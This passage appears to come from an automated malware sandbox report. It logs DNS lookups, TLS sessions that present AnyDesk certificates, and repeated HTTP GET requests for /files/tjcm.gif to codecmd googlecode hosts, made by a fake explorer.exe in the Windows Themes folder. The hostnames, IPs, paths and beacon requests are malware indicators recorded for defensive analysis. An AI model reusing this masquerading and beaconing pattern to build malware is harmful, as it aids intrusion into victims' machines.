                                                                                                                                                                                Jul 16, 2022 23:57:26.808068037 CEST8.8.8.8192.168.2.50x433No error (0)googlecode.l.googleusercontent.com142.250.102.82A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:27.540215015 CEST8.8.8.8192.168.2.50xd62aNo error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:28.041414022 CEST8.8.8.8192.168.2.50x2050No error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:44.249377966 CEST8.8.8.8192.168.2.50x2ef4No error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:45.250171900 CEST8.8.8.8192.168.2.50x2d25No error (0)boot.net.anydesk.com92.223.88.41A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:57:45.804655075 CEST8.8.8.8192.168.2.50xd638No error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:58:24.978725910 CEST8.8.8.8192.168.2.50x86c5No error (0)boot.net.anydesk.com49.12.130.237A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:58:25.390219927 CEST8.8.8.8192.168.2.50x84b8No error (0)boot.net.anydesk.com92.223.88.41A (IP address)IN (0x0001)
                                                                                                                                                                                Jul 16, 2022 23:58:25.845954895 CEST8.8.8.8192.168.2.50x970fNo error (0)boot.net.anydesk.com49.12.130.236A (IP address)IN (0x0001)

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • codecmd01.googlecode.com
                                                                                                                                                                                • codecmd02.googlecode.com
                                                                                                                                                                                • codecmd03.googlecode.com

                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                0192.168.2.54976949.12.130.23680C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:20.019409895 CEST1179OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 c0 5e a3 fe 8e 87 ac bd e5 80 22 1d d4 ed 9e b7 e0 b3 26 81 d2 ea aa 13 ec da a6 e2 19 fe 6b 6d 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                Data Ascii: ^"&kmn0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                Jul 16, 2022 23:57:20.045289040 CEST1181INData Raw: 16 03 03 00 57 02 00 00 53 03 03 62 d3 34 40 e1 4d 06 5c 05 1f 4f b0 e0 ef da 17 0e b0 ab 92 5c f0 3f 08 44 4f 57 4e 47 52 44 01 20 21 19 c0 f2 08 2e 02 2b 21 78 fe 3e 61 8b 1f 7f ec 32 15 a9 6e 82 b0 86 dc f0 41 6e 3b f7 78 9c c0 2c 00 00 0b ff
                                                                                                                                                                                Data Ascii: WSb4@M\O\?DOWNGRD !.+!x>a2nAn;x,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                Jul 16, 2022 23:57:20.045331955 CEST1195INData Raw: ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63 86 83 ac 70 84 75 27 2d 35 3d 7b 7b a8 ce b2 48 79 08 38 2d 82 26 7e 93 4b 32 76 66 85 a7 fd ca f1 0a 2f c7 62 0f 6a 40 fe 1a 6b 58 1c 53 e4 63 c1 75 83 9a
                                                                                                                                                                                Data Ascii: ,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_eCL/3q EOpN{$B
                                                                                                                                                                                Jul 16, 2022 23:57:20.061772108 CEST1201OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 32 30 37 31 37 30 36 35 37
                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 220717065706Z20720704065706Z010UAnyDesk Client0"0*H0uaq4_8[_|_,zN+i/q)NU*E:uFQ[Z+
                                                                                                                                                                                Jul 16, 2022 23:57:20.086858034 CEST1201INData Raw: 15 03 03 00 02 02 2d
                                                                                                                                                                                Data Ascii: -


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                1192.168.2.549775142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:22.092885971 CEST1274OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:22.120779037 CEST1276INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:22 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:22.120810986 CEST1276INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                10192.168.2.549857142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:45.276844025 CEST2616OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:45.303518057 CEST2617INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:45 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:45.303544044 CEST2618INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                11192.168.2.54985892.223.88.4180C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:45.296717882 CEST2616OUTData Raw: 16 03 01 01 0c 01 00 01 08 03 03 b6 a4 b6 45 92 b1 9e 7d dc d3 26 3b 11 79 27 7e 9a f7 bd 32 ea f8 de aa 9c 14 84 6a 4d 6b 2e 2c 00 00 6e c0 30 c0 2c c0 28 c0 24 c0 14 c0 0a 00 a5 00 a3 00 a1 00 9f 00 6b 00 6a 00 69 00 68 00 39 00 38 00 37 00 36
                                                                                                                                                                                Data Ascii: E}&;y'~2jMk.,n0,($kjih98762.*&=5/+'#g@?>32101-)%</q#
                                                                                                                                                                                Jul 16, 2022 23:57:45.329350948 CEST2619INData Raw: 16 03 03 00 57 02 00 00 53 03 03 62 d3 34 59 05 b0 1d af 58 18 63 e0 3a 29 40 4c 0b ab 4c 69 08 a8 83 00 44 4f 57 4e 47 52 44 01 20 03 f2 2d 96 fd aa 72 0a 5d 18 90 5f ab ec ea ee 23 ca 3a 2a 4b 7b 4c 06 77 01 7c 88 09 4a 1b d0 c0 2c 00 00 0b ff
                                                                                                                                                                                Data Ascii: WSb4YXc:)@LLiDOWNGRD -r]_#:*K{Lw|J,C0?0'0vtS$0*H0H10UAnyNet Root CA1 0Uphilandro Software GmbH10UDE0181118021423Z281115021
                                                                                                                                                                                Jul 16, 2022 23:57:45.329385042 CEST2621INData Raw: e0 cd 68 3b 6a 87 6c a6 0d e7 d8 bd 61 df 56 6b 2a e1 1c 2b f5 9f bf 85 dd 8c 5b 06 1e 71 7f ba 4a a6 40 b0 77 17 ea 2c 3f 5b 94 14 85 2e ad 11 61 ab 88 f6 01 bb b3 47 6b e2 81 18 f1 8e 39 e6 d8 7b 0c 63 86 83 ac 70 84 75 27 2d 35 3d 7b 7b a8 ce
                                                                                                                                                                                Data Ascii: h;jlaVk*+[qJ@w,?[.aGk9{cpu'-5={{Hy8-&~K2vf/bj@kXScuxI#ph3/L^}a}4AkP+g_R4gs@lo67Jv"rR}uMU#[~.K_eCL/3
                                                                                                                                                                                Jul 16, 2022 23:57:45.346925020 CEST2622OUTData Raw: 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 82 02 a8 30 82 01 90 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 19 31 17 30 15 06 03 55 04 03 0c 0e 41 6e 79 44 65 73 6b 20 43 6c 69 65 6e 74 30 20 17 0d 32 32 30 37 31 37 30 36 35 37
                                                                                                                                                                                Data Ascii: 000*H010UAnyDesk Client0 220717065706Z20720704065706Z010UAnyDesk Client0"0*H0uaq4_8[_|_,zN+i/q)NU*E:uFQ[Z+
                                                                                                                                                                                Jul 16, 2022 23:57:45.377835035 CEST2622INData Raw: 15 03 03 00 02 02 2d
                                                                                                                                                                                Data Ascii: -


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                12192.168.2.549862142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:46.730978966 CEST2640OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:46.758766890 CEST2642INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:46 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 